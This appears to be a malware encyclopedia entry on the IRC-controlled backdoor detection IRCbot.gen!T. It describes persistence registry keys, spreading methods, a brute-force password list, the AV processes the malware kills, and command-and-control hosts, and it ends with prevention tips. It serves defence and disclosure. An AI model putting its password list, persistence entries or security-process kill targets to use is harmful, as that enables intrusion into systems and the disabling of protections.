Backdoor:Win32/IRCbot.gen!T is a generic detection which may detect several variants of families of IRC-controlled backdoors. These malware allow unauthorized access and control of an affected computer and may be used to perform certain activities when commanded to do so by the backdoor’s controller, such as downloading and executing arbitrary files, or collecting system information.
Variants of the following families of malware may be detected with this name:
Please see the related family or example variant descriptions elsewhere in this encyclopedia for more detailed information on these threats.
Backdoor:Win32/IRCbot.gen!T is a generic detection which may detect several variants of families of IRC-controlled backdoors. These malware allow unauthorized access and control of an affected computer and may be used to perform certain activities when commanded to do so by the backdoor’s controller, such as downloading and executing arbitrary files, or collecting system information.
Variants of the following families of malware may be detected with this name:
Please see the related family or example variant descriptions elsewhere in this encyclopedia for more detailed information on these threats.
Installation
When executed, malware detected as Backdoor:Win32/IRCbot.gen!T typically copies itself using a filename that differs according to variant to the %windir% directory or one of its subdirectories, such as the <system folder>. It also generally makes additional system changes to ensure that it runs upon system startup. For example, it may create a registry entry under a location such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run pointing to a copy of the malware.
For example, one variant copies itself to %windir%\mslsrv32.exe" and makes the following registry modifications:
Sets value: "Microsoft Driver Setup"
With data: "%windir%\mslsrv32.exe"
To subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Sets value: "Microsoft Driver Setup"
With data: "%windir%\mslsrv32.exe"
To subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
Spreads via…
Variable methods
Malware detected as Backdoor:Win32/IRCbot.gen!T typically attempts to spread to other systems on the network when commanded to do so by the backdoor’s controller. Spreading methods may include exploiting weak passwords, exploiting vulnerabilities in unpatched systems, using instant messaging applications, utilizing the autorun feature, or peer to peer file sharing.
Exploits
Some variants attempt to exploit particular vulnerabilities in order to spread. For example, Win32/Neeris may attempt to spread by generating IP address in its local network and attempting to exploit systems unpatched against the vulnerabilities addressed in the following Microsoft Security Bulletins
Neeris may also target computers running Microsoft SQL. It attempts to log on to these computers by exploiting weak passwords. One variant was observed to utilize the following list of passwords and usernames carried in its code:
007
1
12
123
1234
12345
123456
1234567
12345678
123456789
1234567890
2000
2001
2002
2003
2004
access
accounting
accounts
adm
admin
administrador
administrat
administrateur
administrator
admins
asd
backup
bill
bitch
blank
bob
bob
brian
changeme
chris
cisco
compaq
control
data
database
databasepass
databasepassword
db1
db1234
db2
dbpass
dbpassword
default
dell
demo
domain
domainpass
domainpassword
eric
exchange
fred
f*ck
george
god
guest
hell
hello
home
homeuser
hp
ian
ibm
internet
internet
intranet
jen
joe
john
kate
katie
lan
lee
linux
login
loginpass
luke
mail
main
mary
mike
neil
nokia
none
null
oem
oeminstall
oemuser
office
oracle
orainstall
outlook
pass
pass1234
passwd
password
password1
peter
peter
pwd
qaz
qwe
qwerty
root
sa
sam
server
sex
siemens
slut
sql
sqlpassoainstall
staff
student
sue
susan
system
teacher
technical
test
unix
user
web
win2000
win2k
win98
windows
winnt
winpass
winxp
www
zxc
Instant Messaging
Some variants may use other methods of spreading such as via instant messaging programs. For example, Win32/Slenfbot uses the following method to spread via MSN Messenger:
When the attacker orders Win32/Slenfbot to spread via MSN Messenger, they must provide the following three parameters:
-
A URL containing a list of possible messages to send, along with the worm itself, to MSN Messenger contacts. The worm chooses from this list at random.
-
A file name for a ZIP archive. The worm creates a ZIP archive containing a copy of itself in the temporary folder with this name. The worm sends this ZIP archive to MSN Messenger contacts.
-
A file name for the worm's executable inside the ZIP archive.
Removable drives
While other variants spread by copying themselves to removable drives. For example, Win32/Rimecud performs the following actions when spreading via removable drives:
The spreading component of Win32/Rimecud enumerates all drives from B: to Z: searching for fixed and removable drives.
If found the worm copies itself to the root directory of the located drive and creates an autorun.inf file to execute the copy. When the removable or networked drive is accessed from another machine supporting the Autorun feature, the malware is launched automatically. For example, it may create the following files:
The payload component also has the ability to spread via autorun.inf when instructed to do so. In this case, the worm copies itself to a removable drive and creates an autorun.inf to execute it, for example:
-
RECYCLER\autorun.exe
-
autorun.inf
Peer-to-Peer file sharing
Yet other variants may attempt to spread via Peer to Peer file sharing. Win32/Pushbot, for example,
may be ordered to spread by copying themselves to the shared directories of various peer-to-peer file sharing programs, using filenames such as the following:
Windows Live Password reveal.exe
Leona-Lewis-Bleeding-love.mp3.www-freemp3s.com
eMule-0-48a-VeryCD080902-Update.exe
MsnCleaner.exe
KEY-GEN Adobe PhotoShop CS3.exe
KEY-GEN Kaspersky 2009.exe
KEY-GEN ESET NOD32 3.0.650.exe
KEY-GEN Ahead Nero 8 Ultra Edition.exe
Microsoft Office 2007.exe
Kaspersky 7.0 all versions.exe
windows xp genuine keygen.exe
windows xp activation hack 2008.exe
windows xp activation hack 2007.exe
Directories used may include:
%ProgramFiles%\Ares\My Shared Folder\
%ProgramFiles%\Direct Connect\Received Files\
%ProgramFiles%\KMD\My Shared Folder\
%ProgramFiles%\Rapigator\Share\
%ProgramFiles%\XoloX\Downloads\
%ProgramFiles%\Tesla\Files\
%ProgramFiles%\WinMX\My Shared Folder\
%ProgramFiles%\Swaptor\Download\
%ProgramFiles%\Overnet\incoming\
%ProgramFiles%\LimeWire\Shared\
%ProgramFiles%\appleJuice\incoming\
%ProgramFiles%\Filetopia3\Files\
%ProgramFiles%\ICQ\shared files\
%ProgramFiles%\Shareaza\Downloads\
%ProgramFiles%\BearShare\Shared\
%ProgramFiles%\eMule\Incoming\
%ProgramFiles%\Gnucleus\Downloads\
%ProgramFiles%\EDONKEY2000\incoming\
%ProgramFiles%\Morpheus\My Shared Folder\
%ProgramFiles%\Grokster\My Grokster\
%ProgramFiles%\Kazaa Lite\My Shared Folder\
%ProgramFiles%\Kazaa\My Shared Folder\
\My Shared Folder\
Payload
Allows backdoor access and control
Once installed, the malware connects to an IRC server with a specified location and port. Please note that the ports and remote hosts used for this purpose are completely variable and may be different for each iteration of this threat. For example, one variant attempts to connect on port 8585 to cos.chfo991.com, while another attempts to connect on port 51987 to teamdos.org.
After connecting, the malware awaits commands from the backdoor’s controller. These commands may include (but not be limited to) the following examples:
-
Download and execute arbitrary files
-
Update itself
-
Start or stop spreading
-
Collect system information
-
Run various servers on the system
-
Send email or instant messages
-
Participate in Distributed Denial of Service attacks
Lowers system security settings
Some variants attempt to terminate security or AV related program processes, or may attempt to modify computer security settings. The processes targeted and settings modified are highly variable.
For example, one variant attempts to kill the following processes:
mrt.exe
ccenter.exe
fsav.exe
kav.exe
Kavstart.exe
KVSrvXP.exe
KvXP.kxp
msmpeng.exe
nod32.exe
Another variant disables the Task Manager by modifying the following registry entry:
Sets value: "DisableTaskMgr"
With data: "1"
To subkey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Downloads and executes arbitrary files
Some variants may attempt to download and install additional malicious files. For example, one variant was observed attempting to contact the following remote hosts for this purpose:
-
www.cooleasy.com
-
www.mcreate.net
-
kuwago.hp.infoseek.co.jp
-
www.cship.info
Analysis by Lena Lin
Take the following steps to help prevent infection on your system:
-
Enable a firewall on your computer.
-
Get the latest computer updates for all your installed software.
-
Use up-to-date antivirus software.
-
Use caution when opening attachments and accepting file transfers.
-
Use caution when clicking on links to web pages.
-
Avoid downloading pirated software.
-
Protect yourself against social engineering attacks.
-
Use strong passwords.
Enable a firewall on your computer
Use a third-party firewall product or turn on the Microsoft Windows Internet Connection Firewall.
To turn on the Windows Firewall in Windows Vista
-
Click Start, and click Control Panel.
-
Click Security.
-
Click Turn Windows Firewall on or off.
-
Select On.
-
Click OK.
To turn on the Internet Connection Firewall in Windows XP
-
Click Start, and click Control Panel.
-
Click Network and Internet Connections. If you do not see Network and Internet Connections, click Switch to Category View.
-
Click Change Windows Firewall Settings.
-
Select On.
-
Click OK.
Get the latest computer updates
Updates help protect your computer from viruses, worms, and other threats as they are discovered. It is important to install updates for all the software that is installed in your computer. These are usually available from vendor websites.
You can use the Automatic Updates feature in Windows to automatically download future Microsoft security updates while your computer is on and connected to the Internet.
To turn on Automatic Updates in Windows Vista
-
Click Start, and click Control Panel.
-
Click System and Maintainance.
-
Click Windows Updates.
-
Select a setting. Microsoft recommends selecting Install updates automatically and choose a time that is convenient for you. If you do not choose Automatic, but you choose to be notified when updates are ready, a notification balloon appears when new downloads are available to install. Click the notification balloon to review and install the updates.
To turn on Automatic Updates in Windows XP
-
Click Start, and click Control Panel.
-
Click System.
-
Click Automatic Updates.
-
Select a setting. Microsoft recommends selecting Automatic. If you do not choose Automatic, but you choose to be notified when updates are ready, a notification balloon appears when new downloads are available to install. Click the notification balloon to review and install the updates.
Use up-to-date antivirus software
Most antivirus software can detect and prevent infection by known malicious software. To help protect you from infection, you should always run antivirus software that is updated with the latest signature files. Antivirus software is available from several sources. For more information,
see http://www.microsoft.com/protect/computer/viruses/vista.mspx.
Use caution when opening attachments and accepting file transfers
Exercise caution with e-mail and attachments received from unknown sources, or received unexpectedly from known sources. Use extreme caution when accepting file transfers from known or unknown sources.
Use caution when clicking on links to web pages
Exercise caution with links to web pages that you receive from unknown sources, especially if the links are to a web page that you are not familiar with or are suspicious of. Malicious software may be installed in your system simply by visiting a web page with harmful content.
Avoid downloading pirated software
Threats may also be bundled with software and files that are available for download on various torrent sites. Downloading "cracked" or "pirated" software from these sites carries not only the risk of being infected with malware, but is also illegal. For more information, see '
The risks of obtaining and using pirated software'.
Protect yourself from social engineering attacks
While attackers may attempt to exploit vulnerabilities in hardware or software in order to compromise a system, they also attempt to exploit vulnerabilities in human behavior in order to do the same. When an attacker attempts to take advantage of human behavior in order to persuade the affected user to perform an action of the attacker's choice, it is known as 'social engineering'. Essentially, social engineering is an attack against the human interface of the targeted system. For more information, see '
What is social engineering?'.
Use Strong Passwords
Attackers may try to gain access to your Windows account by guessing your password. It is therefore important that you use a strong password – one that cannot be easily guessed by an attacker. A strong password is one that has at least 8 characters, and combines letters, numbers, and symbols. For more information, see
http://www.microsoft.com/protect/yourself/password/create.mspx.
